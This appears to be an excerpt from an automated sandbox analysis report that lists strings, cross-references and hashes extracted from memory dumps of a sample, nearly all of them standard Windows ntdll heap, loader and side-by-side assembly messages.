                                                                                                          • @, xrefs: 010C63A0
                                                                                                          • PreferredUILanguagesPending, xrefs: 010C61D2
                                                                                                          • LanguageConfiguration, xrefs: 010C6420
                                                                                                          • Control Panel\Desktop, xrefs: 010C615E
                                                                                                          • @, xrefs: 010C61B0
                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 010C5FE1
                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 010C635D
                                                                                                          • PreferredUILanguages, xrefs: 010C63D1
                                                                                                          • LanguageConfigurationPending, xrefs: 010C6221
                                                                                                          • @, xrefs: 010C6277
                                                                                                          • @, xrefs: 010C647A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                          Strings
                                                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 01095543
                                                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010954CE
                                                                                                          • undeleted critical section in freed memory, xrefs: 0109542B
                                                                                                          • corrupted critical section, xrefs: 010954C2
                                                                                                          • Invalid debug info address of this critical section, xrefs: 010954B6
                                                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010954E2
                                                                                                          • double initialized or corrupted critical section, xrefs: 01095508
                                                                                                          • Critical section address, xrefs: 01095425, 010954BC, 01095534
                                                                                                          • Address of the debug info found in the active list., xrefs: 010954AE, 010954FA
                                                                                                          • Thread identifier, xrefs: 0109553A
                                                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0109540A, 01095496, 01095519
                                                                                                          • 8, xrefs: 010952E3
                                                                                                          • Critical section address., xrefs: 01095502
                                                                                                          • Critical section debug info address, xrefs: 0109541F, 0109552E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                          Strings
                                                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01092409
                                                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010924C0
                                                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 0109261F
                                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01092624
                                                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01092506
                                                                                                          • @, xrefs: 0109259B
                                                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01092498
                                                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01092602
                                                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010925EB
                                                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01092412
                                                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010922E4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                          • API String ID: 0-1700792311
                                                                                                          Strings
                                                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 010A8A67
                                                                                                          • VerifierDlls, xrefs: 010A8CBD
                                                                                                          • HandleTraces, xrefs: 010A8C8F
                                                                                                          • VerifierDebug, xrefs: 010A8CA5
                                                                                                          • AVRF: -*- final list of providers -*- , xrefs: 010A8B8F
                                                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 010A8A3D
                                                                                                          • VerifierFlags, xrefs: 010A8C50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                          • API String ID: 0-3223716464
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                          • API String ID: 0-1109411897
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                          • API String ID: 0-523794902
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                          • API String ID: 0-4098886588
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                          • API String ID: 0-122214566
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-792281065
                                                                                                          Strings
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01079A11, 01079A3A
                                                                                                          • LdrpInitShimEngine, xrefs: 010799F4, 01079A07, 01079A30
                                                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010799ED
                                                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01079A01
                                                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01079A2A
                                                                                                          • apphelp.dll, xrefs: 01016496
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-204845295
                                                                                                          Strings
                                                                                                          • RtlGetAssemblyStorageRoot, xrefs: 01092160, 0109219A, 010921BA
                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01092180
                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01092178
                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010921BF
                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 01092165
                                                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0109219F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                          • API String ID: 0-861424205
                                                                                                          Strings
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0105C6C3
                                                                                                          • LdrpInitializeImportRedirection, xrefs: 01098177, 010981EB
                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01098181, 010981F5
                                                                                                          • Loading import redirection DLL: '%wZ', xrefs: 01098170
                                                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 010981E5
                                                                                                          • LdrpInitializeProcess, xrefs: 0105C6C4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                          • API String ID: 0-475462383
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                          • API String ID: 0-3393094623
                                                                                                          APIs
                                                                                                            • Part of subcall function 01062DF0: LdrInitializeThunk.NTDLL ref: 01062DFA
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01060BA3
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01060BB6
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01060D60
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01060D74
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 1404860816-0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                          • API String ID: 0-2518169356
                                                                                                          • Opcode ID: 98938cba9eb8aace0bfe00f75f93d16370fa104b83d3d8985a8d1362020f3f99
                                                                                                          • Instruction ID: 99d18f80f78281dccbf320a36cd78a5948013badc7dde633c4bd66f49dc0d3d3
                                                                                                          • Opcode Fuzzy Hash: 98938cba9eb8aace0bfe00f75f93d16370fa104b83d3d8985a8d1362020f3f99
                                                                                                          • Instruction Fuzzy Hash: 5691C0769006198BCB25CF9CC880ABEB7F4FF48310F9941A9E995E7350E375D941CB90
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                          • API String ID: 0-3178619729
                                                                                                          • Opcode ID: 7dcbb418d26cb09abe2c4ab5b99594bc90507ac8bff9ee601f4b597b13f943d4
                                                                                                          • Instruction ID: 896f6860d67029e1ef78e89aae6841d62c60f1b165f5c575c88f4d79199208c0
                                                                                                          • Opcode Fuzzy Hash: 7dcbb418d26cb09abe2c4ab5b99594bc90507ac8bff9ee601f4b597b13f943d4
                                                                                                          • Instruction Fuzzy Hash: 7E13B1B0A00655CFDB65CF68C4907ADBBF5FF89304F1482AAE985AB381D734A945CF90
                                                                                                          Strings
                                                                                                          • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 01087D56
                                                                                                          • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 01087D39
                                                                                                          • SsHd, xrefs: 0103A885
                                                                                                          • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 01087D03
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                                          • API String ID: 0-2905229100
                                                                                                          • Opcode ID: 98e6b90acfe8888875218da74c7cba94efd756ae7701487aa14c36c075b88ebe
                                                                                                          • Instruction ID: 1a70c49aaba147d3728a162d14e6f53b3c3587e38bf6ca5017f2c2d57ec657dc
                                                                                                          • Opcode Fuzzy Hash: 98e6b90acfe8888875218da74c7cba94efd756ae7701487aa14c36c075b88ebe
                                                                                                          • Instruction Fuzzy Hash: E7D18076A00219DBDB25DF98D9C06ADBBF9EF88310F1540AAE9C5EB345D3719841CBA0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                          • API String ID: 0-379654539
                                                                                                          • Opcode ID: acd8180e9f0096dd2b1f270552f9ecb8458186849ad490e62968444db8656f55
                                                                                                          • Instruction ID: f1773ca90daaebbcfd4b5f1ac4585613f2969c4da4c9a93e28062b7af949e1f3
                                                                                                          • Opcode Fuzzy Hash: acd8180e9f0096dd2b1f270552f9ecb8458186849ad490e62968444db8656f55
                                                                                                          • Instruction Fuzzy Hash: 79C1BD702083A6CFD721DF58C144B6AB7E4FF88704F0449AAF9D58BA51EB34DA49CB52
                                                                                                          Strings
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01058421
                                                                                                          • @, xrefs: 01058591
                                                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0105855E
                                                                                                          • LdrpInitializeProcess, xrefs: 01058422
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-1918872054
                                                                                                          • Opcode ID: 06c23dfbd2e81c64be1e2cce19477239c79694c0e3ec1734ad73442366cda19f
                                                                                                          • Instruction ID: 19af855539d778a8a874c4413f6137903bb4cf533c6252887f4b19697b3f23e1
                                                                                                          • Opcode Fuzzy Hash: 06c23dfbd2e81c64be1e2cce19477239c79694c0e3ec1734ad73442366cda19f
                                                                                                          • Instruction Fuzzy Hash: B9917871508345AFDB62DE66CC40EABBAECFF88784F40492EFEC492151E735D9448B62
                                                                                                          Strings
                                                                                                          • HEAP: , xrefs: 010854E0, 010855A1
                                                                                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 010855AE
                                                                                                          • HEAP[%wZ]: , xrefs: 010854D1, 01085592
                                                                                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 010854ED
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                          • API String ID: 0-1657114761
                                                                                                          • Opcode ID: 8a9d12b28338890a87b7cc1a5e458533691238587621f24b04b5f88fa75121c1
                                                                                                          • Instruction ID: 0a3664805e9a4af0b0ce4392add4a0470d47ba25c3e1b32330ca2b0d3a9f7793
                                                                                                          • Opcode Fuzzy Hash: 8a9d12b28338890a87b7cc1a5e458533691238587621f24b04b5f88fa75121c1
                                                                                                          • Instruction Fuzzy Hash: 21A1153060570A9FD725DF28C844BBEBBF9BF84300F1481A9E5D68B68AD734E845CB51
                                                                                                          Strings
                                                                                                          • .Local, xrefs: 010528D8
                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 010921DE
                                                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010921D9, 010922B1
                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010922B6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                          • API String ID: 0-1239276146
                                                                                                          • Opcode ID: 2c471c9867479f96ea178f874fe22f5797c93caec545ce304e8485432df2bc10
                                                                                                          • Instruction ID: f9b2520b91b699b28e6d9394d68b042b424d7558e759957ecb1fe79bf727c358
                                                                                                          • Opcode Fuzzy Hash: 2c471c9867479f96ea178f874fe22f5797c93caec545ce304e8485432df2bc10
                                                                                                          • Instruction Fuzzy Hash: E6A1A03590022AEBDF65CF58D884BAAB7B4BF58314F1541E9DD88AB351D7309E80CF90
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
